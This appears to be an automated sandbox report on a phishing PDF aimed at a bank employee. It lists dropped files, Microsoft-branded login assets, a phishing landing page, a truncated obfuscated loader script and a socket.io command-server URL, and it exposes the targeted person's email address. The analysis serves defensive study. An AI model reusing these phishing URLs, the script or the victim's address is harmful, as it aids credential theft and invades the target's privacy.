                                            Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M38,14H10V34H38V14m2,22H8V12H40V36M17.688,18.8V28.828H15.531V21.234a3.2,3.2,0,0,1-.672.43l-.266.117a2.55,2.55,0,0,1-.562.188,2.423,2.423,0,0,1-.3.07q-.141.023-.281.055V20.266q.422-.125.813-.281t.766-.344a8.253,8.253,0,0,0,1.344-.844h1.313m4.531,8.234h4.156v1.8H19.859v-.75a3.292,3.292,0,0,1,.25-1.344,4.183,4.183,0,0,1,.625-1.078,5.7,5.7,0,0,1,.844-.828q.219-.187.438-.352t.422-.32q.453-.312.766-.578a2.593,2.593,0,0,0,.3-.281l.25-.281a3.148,3.148,0,0,0,.328-.562,1.59,1.59,0,0,0,.109-.609,1.176,1.176,0,0,0-.359-.937,1.552,1.552,0,0,0-1.078-.328,3.625,3.625,0,0,0-2.422,1V19.688a4.866,4.866,0,0,1,1.359-.625,5.548,5.548,0,0,1,1.516-.2,4.456,4.456,0,0,1,1.344.188,2.461,2.461,0,0,1,1,.563,2.242,2.242,0,0,1,.625.875,3.007,3.007,0,0,1,.219,1.156,3.538,3.538,0,0,1-.055.641,3.7,3.7,0,0,1-.148.563,3.439,3.439,0,0,1-.562.953,7.2,7.2,0,0,1-.8.8q-.21
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
                                            Category:downloaded
                                            Size (bytes):673
                                            Entropy (8bit):7.6596900876595075
                                            Encrypted:false
                                            SSDEEP:12:Xl0t8TUViiYi5m6FhSBXWPsigK99WCqKMvBBFThSqfLd81CK6bC+k7LqZLsFlD:XFUVpkNK0Rwid81p6btk7LqZ6D
                                            MD5:0E176276362B94279A4492511BFCBD98
                                            SHA1:389FE6B51F62254BB98939896B8C89EBEFFE2A02
                                            SHA-256:9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
                                            SHA-512:8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
                                            Malicious:false
                                            URL:https://aadcdn.msauth.net/shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 7390
                                            Category:dropped
                                            Size (bytes):2407
                                            Entropy (8bit):7.900400471609788
                                            Encrypted:false
                                            SSDEEP:48:XVBUIsjnR4Zg0ddZ8E5EyQk7J0e+r/9lifUUuHDM3oOY+:XUIIKZg0ddZdEzTsfUUmyY+
                                            MD5:9D372E951D45A26EDE2DC8B417AAE4F8
                                            SHA1:84F97A777B6C33E2947E6D0BD2BFCFFEC601785A
                                            SHA-256:4E9C9141705E9A4D83514CEE332148E1E92126376D049DAED9079252FA9F9212
                                            SHA-512:78F5AA71EA44FF18BA081288F13AD118DB0E1B9C8D4D321ED40DCAB29277BD171BBB25BA7514566BBD4E25EA416C066019077FAA43E6ED781A29ADB683D218E2
                                            Malicious:false
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 513
                                            Category:dropped
                                            Size (bytes):276
                                            Entropy (8bit):7.316609873335077
                                            Encrypted:false
                                            SSDEEP:6:XtqDFR4m68lkQfanvbEzXI0iP427cnLPw6/aqqmb/:XUD34sMDaXI0demb/
                                            MD5:4E3510919D29D18EEB6E3E8B2687D2F5
                                            SHA1:31522A9EC576A462C3F1FFA65C010D4EB77E9A85
                                            SHA-256:1707BE1284617ACC0A66A14448207214D55C3DA4AAF25854E137E138E089257E
                                            SHA-512:DFAD29E3CF9E51D1749961B47382A5151B1F3C98DEABF2B63742EB6B7F7743EE9B605D646A730CF3E087D4F07E43107C8A01FF5F68020C7BF933EBA370175682
                                            Malicious:false
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                            Category:dropped
                                            Size (bytes):1435
                                            Entropy (8bit):7.8613342322590265
                                            Encrypted:false
                                            SSDEEP:24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
                                            MD5:9F368BC4580FED907775F31C6B26D6CF
                                            SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                            SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                            SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                            Malicious:false
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:ASCII text, with very long lines (49854)
                                            Category:dropped
                                            Size (bytes):49993
                                            Entropy (8bit):5.216475744251136
                                            Encrypted:false
                                            SSDEEP:768:RKrClF4PgzcEZ5G/Z4G9qXLZed86mhrjlm:RPXcZ4TLZzpPm
                                            MD5:777EB8FD4F8320B6E5CC9A7159BDEC6A
                                            SHA1:6B4032E88D0040182089FE3BEFDECEE9346E8921
                                            SHA-256:73EBA16BC895FDFA454E27ECB80DEF31EDE8D861F99E175FF93B110EABEC044F
                                            SHA-512:D75B7C43EBD8F49942AEBF8FBDE64A4D826AF27ECED3D6395FFA64FDA31DDEF26E812BEEE313AE9C6114CDA003A8BDC8F1C64A13FA41C3009F5F30E4449876B1
                                            Malicious:false
                                            Preview:/*!. * Socket.IO v4.7.5. * (c) 2014-2024 Guillermo Rauch. * Released under the MIT License.. */.!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(e="undefined"!=typeof globalThis?globalThis:e||self).io=t()}(this,(function(){"use strict";function e(t){return e="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},e(t)}function t(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}function n(e,t){for(var n=0;n<t.length;n++){var r=t[n];r.enumerable=r.enumerable||!1,r.configurable=!0,"value"in r&&(r.writable=!0),Object.defineProperty(e,(i=r.key,o=void 0,"symbol"==typeof(o=function(e,t){if("object"!=typeof e||null===e)return e;var n=e[Symbol.toPrimitive];if(void 0!==n){var r=n.call(e,t||"default");if("object"!=typeof r)return r;th
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 250
                                            Category:dropped
                                            Size (bytes):199
                                            Entropy (8bit):6.766983163126765
                                            Encrypted:false
                                            SSDEEP:6:XtkhhsKHWpSiKPjPOeNWo6Rs7J1TxODwpV:X8hsKHDTPyeNSRs7vV0aV
                                            MD5:21B761F2B1FD37F587D7222023B09276
                                            SHA1:F7A416C8907424F9A9644753E3A93D4D63AE640E
                                            SHA-256:72D4161C18A46D85C5566273567F791976431EFEF49510A0E3DD76FEC92D9393
                                            SHA-512:77745F60804D421B34DE26F8A216CEE27C440E469FD786A642757CCEDBC4875D5196431897D80137BD3E20B01104BA76DEC7D8E75771D8A9B5F14B66F2A9B7C0
                                            Malicious:false
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                            Category:downloaded
                                            Size (bytes):2228
                                            Entropy (8bit):7.82817506159911
                                            Encrypted:false
                                            SSDEEP:48:4/6MuQu6DYYEcBDlBVzqawiHI1Oupgl8m7NCnagQJFknwD:4SabhtXqMHyCl8m7N0ag6D
                                            MD5:EF9941290C50CD3866E2BA6B793F010D
                                            SHA1:4736508C795667DCEA21F8D864233031223B7832
                                            SHA-256:1B9EFB22C938500971AAC2B2130A475FA23684DD69E43103894968DF83145B8A
                                            SHA-512:A0C69C70117C5713CAF8B12F3B6E8BBB9CDAF72768E5DB9DB5831A3C37541B87613C6B020DD2F9B8760064A8C7337F175E7234BFE776EEE5E3588DC5662419D9
                                            Malicious:false
                                            URL:https://www.gstatic.com/recaptcha/api2/logo_48.png
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:Unicode text, UTF-8 text, with very long lines (64593)
                                            Category:dropped
                                            Size (bytes):100217
                                            Entropy (8bit):4.516971585573025
                                            Encrypted:false
                                            SSDEEP:1536:ib8J+apQ3jx2wtA4+eS6e6+mitQT3TLJCLaRlAJ:ix2wtA4+eS6e6+XE3TLJCLIlAJ
                                            MD5:017BA3A123ED0DDCC1CB574DB1AB45FC
                                            SHA1:90A39446F215BA114A27A037E2B06CAF136A8EEB
                                            SHA-256:678C163A3A83C2708B30E296468344A7AD21125A38B10DA67B7C6B55DFF7944A
                                            SHA-512:64852E0525671F98EBD79252DA1C8C8FABD641AC4EEC75FAB1E0FE425B367C6B596F108D7B7E54EC04679E732E6E1395DCDDE26DD63BD1C9A6BCEBFEA0CF994A
                                            Malicious:false
                                            Preview:function _0x1fae(_0x34ba19, _0x598b18) { const _0x59eb05 = _0x59eb(); return _0x1fae = function(_0x1fae59, _0x391fd5) { _0x1fae59 = _0x1fae59 - 0xea; let _0xcbc169 = _0x59eb05[_0x1fae59]; return _0xcbc169; }, _0x1fae(_0x34ba19, _0x598b18); }(function(_0x3ed08f, _0x56c8b3) {. const _0x2019c0 = _0x1fae,. _0x43cc63 = _0x3ed08f();. while (!![]) {. try {. const _0x262285 = parseInt(_0x2019c0(0x121)) / 0x1 + -parseInt(_0x2019c0(0x170)) / 0x2 + -parseInt(_0x2019c0(0x14b)) / 0x3 + -parseInt(_0x2019c0(0x14d)) / 0x4 + -parseInt(_0x2019c0(0x14c)) / 0x5 + -parseInt(_0x2019c0(0x118)) / 0x6 + parseInt(_0x2019c0(0x171)) / 0x7;. if (_0x262285 === _0x56c8b3) break;. else _0x43cc63['push'](_0x43cc63['shift']());. } catch (_0x3070ea) { _0x43cc63['push'](_0x43cc63['shift']()); }. }.}(_0x59eb, 0x27508), window['addEventListener']('load', function() {. const _0x1706f4 = _0x1fae;. document[_0x1706f4(0x166)][_0x1706f4(0x102)](_0x1706f4(0x151
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:SVG Scalable Vector Graphics image
                                            Category:dropped
                                            Size (bytes):1636
                                            Entropy (8bit):4.214613323368661
                                            Encrypted:false
                                            SSDEEP:24:t4pb8W1baAcycV1i21AL5Xr/fJzWTtDYnpTyuwa+BDhMXeDFF6+/OKgXOgWKZsHz:zdyb2+jfJz+sFyN3BdMeFF52KgeTksHz
                                            MD5:F7AB697E65B83CE9870A4736085DEEEC
                                            SHA1:5FF40BFF26B523FBBEAA5228A2AAC63E44AFAA90
                                            SHA-256:CBB3706E65B35A43BDCFEBD23B5479DC0542CA7E23197869B683D12B524472FE
                                            SHA-512:158874143CE65485348813431BB585227772F315234E08158A329DF98319AA5F1DB21DEF2AD7CAA5C25AD11660E7D4E05158CFA1198913A33B1B91676C4CA402
                                            Malicious:false
                                            Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M38,14H10V34H38V14m2,22H8V12H40V36M17.688,18.8V28.828H15.531V21.234a3.2,3.2,0,0,1-.672.43l-.266.117a2.55,2.55,0,0,1-.562.188,2.423,2.423,0,0,1-.3.07q-.141.023-.281.055V20.266q.422-.125.813-.281t.766-.344a8.253,8.253,0,0,0,1.344-.844h1.313m4.531,8.234h4.156v1.8H19.859v-.75a3.292,3.292,0,0,1,.25-1.344,4.183,4.183,0,0,1,.625-1.078,5.7,5.7,0,0,1,.844-.828q.219-.187.438-.352t.422-.32q.453-.312.766-.578a2.593,2.593,0,0,0,.3-.281l.25-.281a3.148,3.148,0,0,0,.328-.562,1.59,1.59,0,0,0,.109-.609,1.176,1.176,0,0,0-.359-.937,1.552,1.552,0,0,0-1.078-.328,3.625,3.625,0,0,0-2.422,1V19.688a4.866,4.866,0,0,1,1.359-.625,5.548,5.548,0,0,1,1.516-.2,4.456,4.456,0,0,1,1.344.188,2.461,2.461,0,0,1,1,.563,2.242,2.242,0,0,1,.625.875,3.007,3.007,0,0,1,.219,1.156,3.538,3.538,0,0,1-.055.641,3.7,3.7,0,0,1-.148.563,3.439,3.439,0,0,1-.562.953,7.2,7.2,0,0,1-.8.8q-.21
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:gzip compressed data, from Unix, original size modulo 2^32 4233
                                            Category:dropped
                                            Size (bytes):2178
                                            Entropy (8bit):7.909869530388447
                                            Encrypted:false
                                            SSDEEP:48:Xlh2vBPJOeOENB85PwXyjRWpMcuwXhgKAkkS86r8ZGwNCo+o1BBmnim:f0zzRCjRWpMcuwPkS86r8Zpyim
                                            MD5:A82353A407066099B4607ED4CC207E0A
                                            SHA1:73BB1474771688BD8A80AB270C06F250C981DFE9
                                            SHA-256:DA2CC7DF7F16001040E28DF50034166362A936629699807254F5B7160EAA4F0D
                                            SHA-512:D9DE69D90720C3135947D331A5979A6E91F1D39E1D1A8E9FACAD00597A1DD5D9C505B365FC2F35768366FC8D8E777172A41542A2E33F0E1771EFDE24B740F51F
                                            Malicious:false
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:HTML document, ASCII text
                                            Category:downloaded
                                            Size (bytes):443
                                            Entropy (8bit):5.666178797438685
                                            Encrypted:false
                                            SSDEEP:12:4WYcVkpD2PP/K6bGu8AWOvfWLSsPZ45dWDd4NbAGbD4NGb:4WYcVvJquRvHWL7PS58Dd4NkG/4NM
                                            MD5:144351B0B621652E38F4BFF5FD7A12C7
                                            SHA1:F1589AA8385C60D485786CAC8F5F003CEC3DFAF0
                                            SHA-256:2D2C0D7EA28E2FA1D438E4AD14A06941C186839A1D0E3BC2C1760B903193F4ED
                                            SHA-512:0E539AD411C51042011CAB23D02BF1B419D15C6DB6EBBBAB82D60E4E36F7BF1A2B7E380A751D844A3681BC1F58514DC28E7A3A9EC4057E68EC4D2E3C9115B983
                                            Malicious:false
                                            URL:https://www.shop4myhealth.ukyb.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPWF6QkxZV289JnVpZD1VU0VSMDEwNzIwMjRVTklRVUUwMjE4MDcwMTEwMjAyNDIwMjQwNzAxMTgwMjEwN0123Ndiana.panaccione@banca.mps.it
                                            Preview:.<!DOCTYPE html>.<html id='html' sti='VlZORlVqQXhNRGN5TURJMFZVNUpVVlZGTURJeE9EQTNNREV4TURJd01qUXlNREkwTURjd01URTRNREl4TUE9PQ==' vic='diana.panaccione@banca.mps.it' lang='en'>..<head>. <script src='https://cdn.socket.io/4.7.5/socket.io.min.js' integrity='sha384-2huaZvOR9iDzHqslqwpR87isEmrfxqyWOF7hr7BY6KG0+hVKLoEXMPUJw3ynWuhO' crossorigin='anonymous'></script>.</head>..<body id='allbody'>..</body>..<script src='jsnom.js'></script>.</html>
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:downloaded
                                            Size (bytes):52
                                            Entropy (8bit):4.190260390968384
                                            Encrypted:false
                                            SSDEEP:3:OnuZoS+NT/ZoS8/ZYn:OnuZoSyT/ZoS8/ZYn
                                            MD5:09BDE5D10D92DEBBB74AE9C3DF3AECAB
                                            SHA1:2F4EEA05E85C26DE82C5E7CBA471687EC8D855EC
                                            SHA-256:F67F67274C88240DE01FA51D483271F58A5752B607B13DEE041C7A0671290E7F
                                            SHA-512:0FF4A460BC9068E61B6EEC0078E97F2AD0DCD12288E8161688351C3BB85A87D624E5B7635C47ED1B5B93C6D3B4A29A756A75A897394B4E6A3986BBB1762CFC6C
                                            Malicious:false
                                            URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISJQmlv2e_JvBBuBIFDZFhlU4SBQ01hlQcEgUNkWGVThIFDZFhlU4=?alt=proto
                                            Preview:CiQKBw2RYZVOGgAKBw01hlQcGgAKBw2RYZVOGgAKBw2RYZVOGgA=
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                            Category:dropped
                                            Size (bytes):2228
                                            Entropy (8bit):7.82817506159911
                                            Encrypted:false
                                            SSDEEP:48:4/6MuQu6DYYEcBDlBVzqawiHI1Oupgl8m7NCnagQJFknwD:4SabhtXqMHyCl8m7N0ag6D
                                            MD5:EF9941290C50CD3866E2BA6B793F010D
                                            SHA1:4736508C795667DCEA21F8D864233031223B7832
                                            SHA-256:1B9EFB22C938500971AAC2B2130A475FA23684DD69E43103894968DF83145B8A
                                            SHA-512:A0C69C70117C5713CAF8B12F3B6E8BBB9CDAF72768E5DB9DB5831A3C37541B87613C6B020DD2F9B8760064A8C7337F175E7234BFE776EEE5E3588DC5662419D9
                                            Malicious:false
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 250
                                            Category:downloaded
                                            Size (bytes):199
                                            Entropy (8bit):6.766983163126765
                                            Encrypted:false
                                            SSDEEP:6:XtkhhsKHWpSiKPjPOeNWo6Rs7J1TxODwpV:X8hsKHDTPyeNSRs7vV0aV
                                            MD5:21B761F2B1FD37F587D7222023B09276
                                            SHA1:F7A416C8907424F9A9644753E3A93D4D63AE640E
                                            SHA-256:72D4161C18A46D85C5566273567F791976431EFEF49510A0E3DD76FEC92D9393
                                            SHA-512:77745F60804D421B34DE26F8A216CEE27C440E469FD786A642757CCEDBC4875D5196431897D80137BD3E20B01104BA76DEC7D8E75771D8A9B5F14B66F2A9B7C0
                                            Malicious:false
                                            URL:https://aadcdn.msauth.net/shared/1.0/content/images/picker_verify_sms_12b7d768ba76f2e782cc74e328171091.svg
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                            Category:downloaded
                                            Size (bytes):1435
                                            Entropy (8bit):7.8613342322590265
                                            Encrypted:false
                                            SSDEEP:24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
                                            MD5:9F368BC4580FED907775F31C6B26D6CF
                                            SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                            SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                            SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                            Malicious:false
                                            URL:https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:JSON data
                                            Category:downloaded
                                            Size (bytes):41
                                            Entropy (8bit):4.180365114215879
                                            Encrypted:false
                                            SSDEEP:3:YGKhIWANmq6LFHYn:YGKhCNU4
                                            MD5:64E1C1EB9F4CAF0CF0E7484D7AFCEDB9
                                            SHA1:69E40D8C48A866A84046FD8BD17AF47FF02B79A4
                                            SHA-256:8ACAC48BC106C4EAE580C08071597F9DAFAB96D959DEFF65BEC44514DA907B1D
                                            SHA-512:F109767D57E85127D18B1AD2030A48C0EAD69F79A15C4008712407B1F62691654B74C9D6E225FFDC4A922847EABB928DC7520A656C7081B585124CF678B54E59
                                            Malicious:false
                                            URL:https://drensyoons1sedt.com/socket.io/?EIO=4&transport=polling&t=PCg0nb7&sid=Szo4MAahAIm3BkqEABL6
                                            Preview:{"code":1,"message":"Session ID unknown"}
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:gzip compressed data, from Unix, original size modulo 2^32 100217
                                            Category:downloaded
                                            Size (bytes):19397
                                            Entropy (8bit):7.9818968069584955
                                            Encrypted:false
                                            SSDEEP:384:Lxqr2jjvGDzqZPUrdB6gMBLrWH6skJGU+XqXLmXGWN5p8:LxVG/qZimTLrO6dJ5+XumlNQ
                                            MD5:7C890A083C04240A86C34574FC003B7C
                                            SHA1:F29EFB6015BBBA9EF2C90A6BDCB98C5009ACAA64
                                            SHA-256:D35AC96DFAC2E25CCB32EFB7CABADC089DF41DFD9B7B3072C50FABF6169FC598
                                            SHA-512:23D029F81B6AB6FD759CCBA3695C6741F983775DF1BB939CF19685A22A083787D3A9C186AED65DE02E59538B42E3331D9AD6EA3DA167EA3A152BDF16A3AA6EB0
                                            Malicious:false
                                            URL:https://www.shop4myhealth.ukyb.com/m/jsnom.js
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:ASCII text, with very long lines (49854)
                                            Category:downloaded
                                            Size (bytes):49993
                                            Entropy (8bit):5.216475744251136
                                            Encrypted:false
                                            SSDEEP:768:RKrClF4PgzcEZ5G/Z4G9qXLZed86mhrjlm:RPXcZ4TLZzpPm
                                            MD5:777EB8FD4F8320B6E5CC9A7159BDEC6A
                                            SHA1:6B4032E88D0040182089FE3BEFDECEE9346E8921
                                            SHA-256:73EBA16BC895FDFA454E27ECB80DEF31EDE8D861F99E175FF93B110EABEC044F
                                            SHA-512:D75B7C43EBD8F49942AEBF8FBDE64A4D826AF27ECED3D6395FFA64FDA31DDEF26E812BEEE313AE9C6114CDA003A8BDC8F1C64A13FA41C3009F5F30E4449876B1
                                            Malicious:false
                                            URL:https://cdn.socket.io/4.7.5/socket.io.min.js
                                            Preview:/*!. * Socket.IO v4.7.5. * (c) 2014-2024 Guillermo Rauch. * Released under the MIT License.. */.!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(e="undefined"!=typeof globalThis?globalThis:e||self).io=t()}(this,(function(){"use strict";function e(t){return e="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},e(t)}function t(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}function n(e,t){for(var n=0;n<t.length;n++){var r=t[n];r.enumerable=r.enumerable||!1,r.configurable=!0,"value"in r&&(r.writable=!0),Object.defineProperty(e,(i=r.key,o=void 0,"symbol"==typeof(o=function(e,t){if("object"!=typeof e||null===e)return e;var n=e[Symbol.toPrimitive];if(void 0!==n){var r=n.call(e,t||"default");if("object"!=typeof r)return r;th
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 7390
                                            Category:downloaded
                                            Size (bytes):2407
                                            Entropy (8bit):7.900400471609788
                                            Encrypted:false
                                            SSDEEP:48:XVBUIsjnR4Zg0ddZ8E5EyQk7J0e+r/9lifUUuHDM3oOY+:XUIIKZg0ddZdEzTsfUUmyY+
                                            MD5:9D372E951D45A26EDE2DC8B417AAE4F8
                                            SHA1:84F97A777B6C33E2947E6D0BD2BFCFFEC601785A
                                            SHA-256:4E9C9141705E9A4D83514CEE332148E1E92126376D049DAED9079252FA9F9212
                                            SHA-512:78F5AA71EA44FF18BA081288F13AD118DB0E1B9C8D4D321ED40DCAB29277BD171BBB25BA7514566BBD4E25EA416C066019077FAA43E6ED781A29ADB683D218E2
                                            Malicious:false
                                            URL:https://aadcdn.msauth.net/shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 513
                                            Category:downloaded
                                            Size (bytes):276
                                            Entropy (8bit):7.316609873335077
                                            Encrypted:false
                                            SSDEEP:6:XtqDFR4m68lkQfanvbEzXI0iP427cnLPw6/aqqmb/:XUD34sMDaXI0demb/
                                            MD5:4E3510919D29D18EEB6E3E8B2687D2F5
                                            SHA1:31522A9EC576A462C3F1FFA65C010D4EB77E9A85
                                            SHA-256:1707BE1284617ACC0A66A14448207214D55C3DA4AAF25854E137E138E089257E
                                            SHA-512:DFAD29E3CF9E51D1749961B47382A5151B1F3C98DEABF2B63742EB6B7F7743EE9B605D646A730CF3E087D4F07E43107C8A01FF5F68020C7BF933EBA370175682
                                            Malicious:false
                                            URL:https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:gzip compressed data, from Unix, original size modulo 2^32 4233
                                            Category:downloaded
                                            Size (bytes):2178
                                            Entropy (8bit):7.909869530388447
                                            Encrypted:false
                                            SSDEEP:48:Xlh2vBPJOeOENB85PwXyjRWpMcuwXhgKAkkS86r8ZGwNCo+o1BBmnim:f0zzRCjRWpMcuwPkS86r8Zpyim
                                            MD5:A82353A407066099B4607ED4CC207E0A
                                            SHA1:73BB1474771688BD8A80AB270C06F250C981DFE9
                                            SHA-256:DA2CC7DF7F16001040E28DF50034166362A936629699807254F5B7160EAA4F0D
                                            SHA-512:D9DE69D90720C3135947D331A5979A6E91F1D39E1D1A8E9FACAD00597A1DD5D9C505B365FC2F35768366FC8D8E777172A41542A2E33F0E1771EFDE24B740F51F
                                            Malicious:false
                                            URL:https://www.shop4myhealth.ukyb.com/favicon.ico
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
                                            Category:dropped
                                            Size (bytes):673
                                            Entropy (8bit):7.6596900876595075
                                            Encrypted:false
                                            SSDEEP:12:Xl0t8TUViiYi5m6FhSBXWPsigK99WCqKMvBBFThSqfLd81CK6bC+k7LqZLsFlD:XFUVpkNK0Rwid81p6btk7LqZ6D
                                            MD5:0E176276362B94279A4492511BFCBD98
                                            SHA1:389FE6B51F62254BB98939896B8C89EBEFFE2A02
                                            SHA-256:9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
                                            SHA-512:8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
                                            Malicious:false
                                            File type:PDF document, version 1.4, 0 pages
                                            Entropy (8bit):7.789026690182917
                                            TrID:
                                            • Adobe Portable Document Format (5005/1) 100.00%
                                            File name:Updated_Proposal_20241113_pdf_banca.pdf
                                            File size:34'633 bytes
                                            MD5:53d9a51b1c57265887013aac78134bf6
                                            SHA1:faa2f71fb8becfdb149838cfa6e2021052d70a94
                                            SHA256:79e3ec607922b203c9b48ee2bcc59d7130c38a332ad15fc5cdfe8eec87886319
                                            SHA512:2a5ef923b5177a71af902cb8a51d31cf85a266c469f9d99faa4fe0ea531ec34796a5c551cfd8420a81aaaf489b18160cb2168f683e7bf47a45591f861091c59a
                                            SSDEEP:768:7UyV8XJPI7x+rbQ+kbj/uMi9HQ010ODdoPnxEZ/:wPvoqQKDmxa/
                                            TLSH:A7F29E70A89C0C7DF8868775997C340B446D76638DE060F2306A4FD66CF89D4A9B3EA7
                                            File Content Preview:%PDF-1.4.1 0 obj.<<./Title (...I.n.v.o.i.c.e. .N.o.t.i.f.i.c.a.t.i.o.n)./Creator (...w.k.h.t.m.l.t.o.p.d.f. .0...1.2...6)./Producer (...Q.t. .4...8...7)./CreationDate (D:20241113224717-08'00').>>.endobj.3 0 obj.<<./Type /ExtGState./SA true./SM 0.02./ca 1.
                                            Icon Hash:62cc8caeb29e8ae0

                                            General

                                            Header:%PDF-1.4
                                            Total Entropy:7.789027
                                            Total Bytes:34633
                                            Stream Entropy:7.911108
                                            Stream Bytes:29264
                                            Entropy outside Streams:5.234734
                                            Bytes outside Streams:5369
                                            Number of EOF found:1
                                            Bytes after EOF:
                                            Name            Count
                                            obj             39
                                            endobj          39
                                            stream          11
                                            endstream       11
                                            xref            1
                                            trailer         1
                                            startxref       1
                                            /Page           1
                                            /Encrypt        0
                                            /ObjStm         0
                                            /URI            2
                                            /JS             0
                                            /JavaScript     0
                                            /AA             0
                                            /OpenAction     0
                                            /AcroForm       0
                                            /JBIG2Decode    0
                                            /RichMedia      0
                                            /Launch         0
                                            /EmbeddedFile   0

                                            Image Streams

                                            ID   DHASH              MD5                                Preview
                                            6    8282828282828280   997b0a66c248cbd54a9d56d549887da1
                                            8    0000000000000000   50dcf8dec76f75ff9385d70d9f9f9ec7
                                            10   e0008000008000e0   8778b1324e33288cf24019020fe6b741
                                            12   8a35b4b730ccd3b4   f1d332a6ab9df49dccd522c9755d7b77
                                            15   515a525e17b29980   58811bc8871b5aa40671c69375f88874
                                            No network behavior found

                                            Target ID:0
                                            Start time:04:28:07
                                            Start date:14/11/2024
                                            Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                            Wow64 process (32bit):false
